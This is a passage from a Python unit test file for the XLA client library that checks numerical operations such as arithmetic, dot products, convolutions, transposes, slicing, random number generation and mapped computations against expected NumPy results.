broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
class ParametersTest(LocalComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class LocalBufferTest(LocalComputationTest):
"""Tests focusing on execution with LocalBuffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
arg_buffers = [xla_client.LocalBuffer.from_py(arg) for arg in arguments]
result_buffer = compiled_c.ExecuteWithLocalBuffers(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11)],
expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11), NumpyArrayF32(3.14)],
expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().CompileWithExampleArguments([arg])
arg_buffer = xla_client.LocalBuffer.from_py(arg)
arg_buffer.delete()
with self.assertRaises(ValueError):
compiled_c.ExecuteWithLocalBuffers([arg_buffer])
class SingleOpTest(LocalComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As few additional ops as possible are added around the op
being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.xla_data_pb2.PRED,
np.int32: xla_client.xla_data_pb2.S32,
np.int64: xla_client.xla_data_pb2.S64,
np.float32: xla_client.xla_data_pb2.F32,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = c.Build().Compile().Execute()
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.xla_data_pb2.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[1, 1], xla_client.PaddingType.SAME)
result = np.array([[[[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[2, 1], xla_client.PaddingType.VALID)
result = np.array([[[[640., 700., 760.],
[1120., 1180., 1240.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
[(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.xla_data_pb2.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = padding_config.dimensions.add()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
padding_config)
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
# TODO(b/72689392): re-enable when bug S32 resolved
def DISABLED_testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = c.Build().Compile().Execute()
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(c.Constant(NumpyArrayF32(0.)), c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = c.Build().Compile().Execute()
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayF32(lo)), c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = c.Build().Compile().Execute()
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayS32(lo)), c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = c.Build().Compile().Execute()
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
class EmbeddedComputationsTest(LocalComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
